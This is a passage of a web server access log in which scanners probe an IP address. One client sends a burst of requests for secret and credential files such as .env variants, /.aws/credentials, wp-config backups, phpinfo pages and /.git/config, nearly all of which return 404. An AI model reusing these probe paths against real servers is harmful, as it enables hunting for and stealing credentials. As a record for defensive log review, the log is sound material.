3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[15/Jan/2026:05:54:44 +0000] 200 - GET http 92.249.249.197 "/" [Client 167.94.138.55] [Length 568] [Gzip 1.86] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" +[15/Jan/2026:05:54:46 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 167.94.138.55] [Length 154] [Gzip -] "-" "-" +[15/Jan/2026:05:54:49 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 167.94.138.55] [Length 154] [Gzip -] "-" "-" +[15/Jan/2026:05:54:51 +0000] 400 - GET http 92.249.249.197 "/favicon.ico" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[15/Jan/2026:05:55:47 +0000] 404 - GET http 92.249.249.197 "/.well-known/security.txt" [Client 167.94.138.55] [Length 122] [Gzip 1.35] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" +[15/Jan/2026:05:55:49 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 167.94.138.55] [Length 154] [Gzip -] "-" "-" +[15/Jan/2026:05:56:05 +0000] 400 - GET http 92.249.249.197 "/" [Client 167.94.146.50] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" +[15/Jan/2026:05:56:05 +0000] 400 - - http localhost "-" [Client 167.94.146.50] [Length 154] [Gzip -] "-" "-" +[15/Jan/2026:05:56:09 +0000] 400 - GET http 92.249.249.197 "/security.txt" [Client 167.94.146.50] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" +[15/Jan/2026:06:01:22 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[15/Jan/2026:06:05:06 +0000] 200 - GET http 92.249.249.197 "/" [Client 20.168.120.227] [Length 568] [Gzip 1.86] "Mozilla/5.0 zgrab/0.x" "-" +[15/Jan/2026:06:06:34 +0000] 404 - GET http 92.249.249.197 "/developmentserver/metadatauploader" [Client 20.65.193.226] [Length 122] [Gzip 1.35] "Mozilla/5.0 zgrab/0.x" "-" +[15/Jan/2026:06:06:50 +0000] 200 - GET http localhost-nginx-proxy-manager "/" [Client 93.174.93.12] [Length 1033] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.87 Safari/537.36" "-" +[15/Jan/2026:06:08:12 +0000] 200 - GET http 92.249.249.197 "/" [Client 103.203.56.2] [Length 1033] [Gzip -] "HTTP Banner Detection (https://security.ipip.net)" "-" +[15/Jan/2026:06:08:54 +0000] 200 - GET http 92.249.249.197 "/" [Client 149.50.103.48] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[15/Jan/2026:06:18:04 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[15/Jan/2026:06:20:30 +0000] 200 - GET http 92.249.249.197 "/" [Client 176.65.148.247] [Length 1033] [Gzip -] "-" "-" +[15/Jan/2026:06:25:29 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[15/Jan/2026:06:39:08 +0000] 404 - GET http 92.249.249.197 "/.env" [Client 109.199.104.175] [Length 122] [Gzip 1.35] "Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; NOKIA; Lumia 920) like Geckoo" "-" +[15/Jan/2026:06:49:34 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[15/Jan/2026:06:59:10 +0000] 404 - GET http 92.249.249.197 "/.git/config" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0" "-" +[15/Jan/2026:06:59:17 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 45.148.10.247] [Length 154] [Gzip -] "-" "-" +[15/Jan/2026:06:59:25 +0000] 200 - GET http 92.249.249.197 "/" [Client 45.148.10.247] [Length 1033] [Gzip -] "-" "-" +[15/Jan/2026:06:59:27 +0000] 200 - GET http 92.249.249.197 "/" [Client 45.148.10.247] [Length 1033] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[15/Jan/2026:06:59:27 +0000] 404 - GET http 92.249.249.197 "/.env" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[15/Jan/2026:06:59:27 +0000] 404 - GET http 92.249.249.197 "/phpinfo" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[15/Jan/2026:06:59:27 +0000] 404 - GET http 92.249.249.197 "/phpinfo.php" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[15/Jan/2026:06:59:30 +0000] 404 - GET http 92.249.249.197 "/portal/.env" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[15/Jan/2026:06:59:32 +0000] 404 - GET http 92.249.249.197 "/env/.env" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[15/Jan/2026:06:59:32 +0000] 404 - GET http 92.249.249.197 "/api/.env" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[15/Jan/2026:06:59:32 +0000] 404 - GET http 92.249.249.197 "/app/.env" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[15/Jan/2026:06:59:35 +0000] 404 - GET http 92.249.249.197 "/dev/.env" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[15/Jan/2026:06:59:35 +0000] 404 - GET http 92.249.249.197 "/new/.env" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[15/Jan/2026:06:59:35 +0000] 404 - GET http 92.249.249.197 "/new/.env.local" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[15/Jan/2026:06:59:35 +0000] 404 - GET http 92.249.249.197 "/new/.env.production" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[15/Jan/2026:06:59:35 +0000] 404 - GET http 92.249.249.197 "/new/.env.staging" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[15/Jan/2026:06:59:35 +0000] 404 - GET http 92.249.249.197 "/_phpinfo.php" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[15/Jan/2026:06:59:35 +0000] 404 - GET http 92.249.249.197 "/_profiler/phpinfo" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[15/Jan/2026:06:59:35 +0000] 404 - GET http 92.249.249.197 "/_profiler/phpinfo/info.php" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[15/Jan/2026:06:59:35 +0000] 404 - GET http 92.249.249.197 "/_profiler/phpinfo/phpinfo.php" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[15/Jan/2026:06:59:35 +0000] 404 - GET http 92.249.249.197 "/wp-config" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[15/Jan/2026:06:59:35 +0000] 404 - GET http 92.249.249.197 "/aws-secret.yaml" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[15/Jan/2026:06:59:35 +0000] 404 - GET http 92.249.249.197 "/awstats/.env" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[15/Jan/2026:06:59:37 +0000] 404 - GET http 92.249.249.197 "/conf/.env" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[15/Jan/2026:06:59:39 +0000] 404 - GET http 92.249.249.197 "/cron/.env" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[15/Jan/2026:06:59:39 +0000] 404 - GET http 92.249.249.197 "/www/.env" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[15/Jan/2026:06:59:41 +0000] 404 - GET http 92.249.249.197 "/docker/.env" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[15/Jan/2026:06:59:41 +0000] 404 - GET http 92.249.249.197 "/docker/app/.env" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[15/Jan/2026:06:59:41 +0000] 404 - GET http 92.249.249.197 "/env.backup" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[15/Jan/2026:06:59:41 +0000] 404 - GET http 92.249.249.197 "/xampp/phpinfo.php" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[15/Jan/2026:06:59:43 +0000] 404 - GET http 92.249.249.197 "/lara/info.php" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[15/Jan/2026:06:59:43 +0000] 404 - GET http 92.249.249.197 "/lara/phpinfo.php" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[15/Jan/2026:06:59:43 +0000] 404 - GET http 92.249.249.197 "/laravel/info.php" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[15/Jan/2026:06:59:43 +0000] 404 - GET http 92.249.249.197 "/.vscode/.env" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[15/Jan/2026:06:59:43 +0000] 404 - GET http 92.249.249.197 "/js/.env" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[15/Jan/2026:06:59:44 +0000] 404 - GET http 92.249.249.197 "/laravel/.env" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[15/Jan/2026:06:59:46 +0000] 404 - GET http 92.249.249.197 "/laravel/core/.env" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[15/Jan/2026:06:59:46 +0000] 404 - GET http 92.249.249.197 "/mail/.env" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[15/Jan/2026:06:59:46 +0000] 404 - GET http 92.249.249.197 "/mailer/.env" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[15/Jan/2026:06:59:46 +0000] 404 - GET http 92.249.249.197 "/nginx/.env" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[15/Jan/2026:06:59:49 +0000] 404 - GET http 92.249.249.197 "/public/.env" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[15/Jan/2026:06:59:50 +0000] 404 - GET http 92.249.249.197 "/site/.env" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[15/Jan/2026:06:59:50 +0000] 404 - GET http 92.249.249.197 "/xampp/.env" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[15/Jan/2026:06:59:50 +0000] 404 - GET http 92.249.249.197 "/main/.env" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[15/Jan/2026:06:59:50 +0000] 404 - GET http 92.249.249.197 "/node_modules/.env" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[15/Jan/2026:06:59:50 +0000] 404 - GET http 92.249.249.197 "/kyc/.env" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[15/Jan/2026:06:59:50 +0000] 404 - GET http 92.249.249.197 "/admin/.env" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[15/Jan/2026:06:59:50 +0000] 404 - GET http 92.249.249.197 "/prod/.env" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[15/Jan/2026:06:59:50 +0000] 404 - GET http 92.249.249.197 "/.env.bak" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[15/Jan/2026:06:59:50 +0000] 404 - GET http 92.249.249.197 "/api/shared/config/config.env" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[15/Jan/2026:06:59:50 +0000] 404 - GET http 92.249.249.197 "/api/shared/config.env" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[15/Jan/2026:06:59:50 +0000] 404 - GET http 92.249.249.197 "/config.env" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[15/Jan/2026:06:59:52 +0000] 404 - GET http 92.249.249.197 "/website/.env" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[15/Jan/2026:06:59:52 +0000] 404 - GET http 92.249.249.197 "/development/.env" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[15/Jan/2026:06:59:52 +0000] 404 - GET http 92.249.249.197 "/backend/.env" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[15/Jan/2026:06:59:52 +0000] 404 - GET http 92.249.249.197 "/api/shared/config/.env" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[15/Jan/2026:06:59:52 +0000] 404 - GET http 92.249.249.197 "/api/shared/.env" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[15/Jan/2026:06:59:52 +0000] 404 - GET http 92.249.249.197 "/api/config.env" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[15/Jan/2026:06:59:52 +0000] 404 - GET http 92.249.249.197 "/service/email_service.py" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[15/Jan/2026:06:59:52 +0000] 404 - GET http 92.249.249.197 "/node/.env_example" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[15/Jan/2026:06:59:54 +0000] 404 - GET http 92.249.249.197 "/.env.production.local" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[15/Jan/2026:06:59:54 +0000] 404 - GET http 92.249.249.197 "/.env.local" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[15/Jan/2026:06:59:54 +0000] 404 - GET http 92.249.249.197 "/.env.example" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[15/Jan/2026:06:59:54 +0000] 404 - GET http 92.249.249.197 "/.env.stage" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[15/Jan/2026:06:59:56 +0000] 400 - GET http 92.249.249.197 "/server/config/database.js" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[15/Jan/2026:06:59:56 +0000] 404 - GET http 92.249.249.197 "/.env.old" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[15/Jan/2026:06:59:56 +0000] 404 - GET http 92.249.249.197 "/.env_sample" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[15/Jan/2026:06:59:56 +0000] 400 - GET http 92.249.249.197 "/scripts/nodemailer.js" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[15/Jan/2026:06:59:56 +0000] 404 - GET http 92.249.249.197 "/.env.prod" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[15/Jan/2026:06:59:56 +0000] 404 - GET http 92.249.249.197 "/crm/.env" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[15/Jan/2026:06:59:56 +0000] 404 - GET http 92.249.249.197 "/local/.env" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[15/Jan/2026:06:59:56 +0000] 404 - GET http 92.249.249.197 "/core/.env" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[15/Jan/2026:06:59:56 +0000] 404 - GET http 92.249.249.197 "/apps/.env" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[15/Jan/2026:06:59:56 +0000] 404 - GET http 92.249.249.197 "/application/.env" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[15/Jan/2026:06:59:56 +0000] 404 - GET http 92.249.249.197 "/web/.env" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[15/Jan/2026:06:59:56 +0000] 404 - GET http 92.249.249.197 "/.aws/credentials" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[15/Jan/2026:06:59:56 +0000] 404 - GET http 92.249.249.197 "/wp-config.php.bak" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[15/Jan/2026:06:59:56 +0000] 404 - GET http 92.249.249.197 "/info.php" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[15/Jan/2026:06:59:56 +0000] 404 - GET http 92.249.249.197 "/dashboard/phpinfo.php" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[15/Jan/2026:06:59:57 +0000] 400 - GET http 92.249.249.197 "/static/js/main.141b0494.js" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[15/Jan/2026:06:59:57 +0000] 400 - GET http 92.249.249.197 "/static/js/2.ca066a4b.chunk.js" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[15/Jan/2026:06:59:58 +0000] 400 - GET http 92.249.249.197 "/static/js/main.e85f7a37.js" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[15/Jan/2026:06:59:59 +0000] 404 - GET http 92.249.249.197 "/admin/server_info.php" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[15/Jan/2026:06:59:59 +0000] 404 - GET http 92.249.249.197 "/server_info.php" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[15/Jan/2026:06:59:59 +0000] 404 - GET http 92.249.249.197 "/app_dev.php/_profiler/phpinfo" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[15/Jan/2026:06:59:59 +0000] 404 - GET http 92.249.249.197 "/test.php" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[15/Jan/2026:06:59:59 +0000] 404 - GET http 92.249.249.197 "/server-info" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[15/Jan/2026:06:59:59 +0000] 404 - GET http 92.249.249.197 "/server-info.php" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[15/Jan/2026:06:59:59 +0000] 404 - GET http 92.249.249.197 "/secured/phpinfo.php" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[15/Jan/2026:06:59:59 +0000] 400 - GET http 92.249.249.197 "/config.js" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[15/Jan/2026:07:00:00 +0000] 400 - GET http 92.249.249.197 "/server.js" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[15/Jan/2026:07:00:01 +0000] 404 - GET http 92.249.249.197 "/appsettings.json" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[15/Jan/2026:07:00:01 +0000] 400 - GET http 92.249.249.197 "/shared/config/config.js" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[15/Jan/2026:07:00:01 +0000] 404 - GET http 92.249.249.197 "/config/aws.yml" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[15/Jan/2026:07:00:01 +0000] 404 - GET http 92.249.249.197 "/settings.py" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[15/Jan/2026:07:00:01 +0000] 404 - GET http 92.249.249.197 "/config.json" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[15/Jan/2026:07:00:01 +0000] 400 - GET http 92.249.249.197 "/main.js" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[15/Jan/2026:07:00:02 +0000] 400 - GET http 92.249.249.197 "/config/constants.js" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[15/Jan/2026:07:00:03 +0000] 404 - GET http 92.249.249.197 "/application.properties" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[15/Jan/2026:07:00:03 +0000] 400 - GET http 92.249.249.197 "/public/js/main.js" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[15/Jan/2026:07:00:04 +0000] 400 - GET http 92.249.249.197 "/js/main.js" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[15/Jan/2026:07:00:04 +0000] 200 - GET http 92.249.249.197 "/?phpinfo=1" [Client 45.148.10.247] [Length 1033] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[15/Jan/2026:07:00:04 +0000] 404 - GET http 92.249.249.197 "/storage/logs/laravel.log" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[15/Jan/2026:07:00:04 +0000] 404 - GET http 92.249.249.197 "/karma.conf.json" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[15/Jan/2026:07:00:04 +0000] 404 - GET http 92.249.249.197 